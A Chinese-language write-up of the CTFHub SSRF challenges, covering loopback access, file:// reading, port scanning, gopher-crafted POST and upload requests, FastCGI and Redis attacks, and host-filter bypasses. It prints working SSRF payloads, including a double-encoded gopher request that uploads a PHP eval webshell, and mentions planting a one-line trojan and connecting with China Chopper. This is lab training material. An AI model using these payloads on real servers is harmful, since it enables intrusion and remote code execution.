当前位置: 首页 > news >正文

cthub-ssrf通关攻略

内网访问 

一.进入页面,选择内网访问

二.开启题目,点击题目中的链接

 然后就进来页面了

三.在url里输入

http://127.0.0.1/flag.php就可以得到flag 

四.提交flag

伪协议读取文件

一开启题目

二.点击进入链接 

三.输入file:///var/www/html/flag.php 然后发现页面不显示,查看页面源代码然后就得到flag

端口扫描 

一.开启端口扫描点击如图中链接

二.进入如图所示页面输入http://127.0.0.1:8000 

 

 三.打开burp抓包,发送到攻击器

先清除playload然后再8000的地方上添加playload 

 四.如图所示修改里面的值

 五.跑出来之后点开响应包可以查看flag

post请求

一.开启题目,点击题目链接 

 二.输入http://127.0.0.1/flag.php弹出一个框

打开页面源代码,复制key粘贴到提交框中 

 三.打开brup抓包,将抓到的数据留下如图所示内容修改为gopher构造post请求数据包

四.将里面内容进行俩次url编码 

五.然后关闭抓包,再次回到页面

六.输入gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0D%0AHost:127.0.0.1:80%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=6800122d69cd52dcc2aa3dafbe6c1c3c%0D%0A编号的url编码最后得出flag 

上传文件

一.点击开启,点入所给出的链接

二.进入浏览页面输入http://127.0.0.1/flag.php

出现上次文件

 发现没有提交按钮,我们自己往上写一个提交按钮

然后我们在自己写1.txt个文件进行提交

三.然后打开brup抓包 

在抓包页面进行编辑 

四.将抓好的内容进行俩次编码 

 五. 输入编码

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:127.0.0.1:80%250D%250AUser-Agent:%2520Mozilla/5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64;%2520rv:129.0)%2520Gecko/20100101%2520Firefox/129.0%250D%250AAccept:%2520text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8%250D%250AAccept-Language:%2520zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2%250D%250AAccept-Encoding:%2520gzip,%2520deflate%250D%250AContent-Type:%2520multipart/form-data;%2520boundary=---------------------------13738711502688661258731329629%250D%250AContent-Length:%2520381%250D%250AOrigin:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800%250D%250AConnection:%2520close%250D%250AReferer:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests:%25201%250D%250APriority:%2520u=0,%2520i%250D%250A%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.php%2522%250D%250AContent-Type:%2520application/octet-stream%250D%250A%250D%250A%253C?php%2520@eval($_POST%255B'cmd'%255D);?%253E%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250D%250A-----------------------------137387115026886612587313296%250D%250A得到flag进行提交

FastCGl协议

开启题目

打开kali运行如图所示命令 ,利用一句话木马进行base64编码

 将上图所得的链接去url编码

然后访问shell.php 

 打开中国菜刀进行链接

链接成功后可在根目录下查看flag 

进行提交flag 

redis协议 

开启题目

进入kali输入如图所示命令 

 

将kali里给出的链接进行url编码 

编码后进行访问 

利用菜刀链接网站进入根查看flag 

提交flag 

urlbypass 

 进入链接

然后会看到下面有链接,将http://notfound.ctfhub.com输入url里面后面加上@127.0.0.1 /flag.php就会得到flag

 

 

 

数字ip bypass

开启题目,进入链接

 

 在链接后面输入http://0x7f000001/flag.php就可以得出flag

 

302跳转 

点击开启,进入链接

在后面输入http://localhost/flag.php ,然后就得出flag

dns重绑定bypass 

开启题目点击进入链接

 

输入http://localhost/flag.php就可以得到flag

 


http://www.mrgr.cn/news/14549.html

相关文章:

  • 数据库系统之逻辑设计
  • ES6随笔
  • 第二讲__提炼
  • 使用Python写贪吃蛇游戏
  • 动态代理和静态代理的区别,动态代理怎么提高网络安全性
  • 结构型设计模式-适配器(adapter)模式-python实现
  • 【香橙派系列教程】(十六) 语音模块与阿里云结合
  • CSR和COO实现spgemm
  • Java面试宝典-java基础02
  • docker网络+跨主机容器之间的通讯
  • 【Java】—— Java面向对象基础:Java中类的构造器与属性初始化,Student类的实例
  • Kafka 到数据仓库:使用 bend-ingest-kafka 将消息加载到 Databend
  • 【Hot100】LeetCode—79. 单词搜索
  • Linux查看jvm相关参数以及设置调优参数
  • MFC工控项目实例之八选择下拉菜单添加打钩图标
  • BaseCTF-Web-Week2-WP
  • linux修改文件的修改时间
  • 三天吃透Java面试八股文
  • 从0到1框架搭建,Python+Pytest+Allure+Git+Jenkins接口自动化框架(超细整理)
  • 不同搜索引擎蜘蛛的功能、‌抓取策略与技术实现差异探究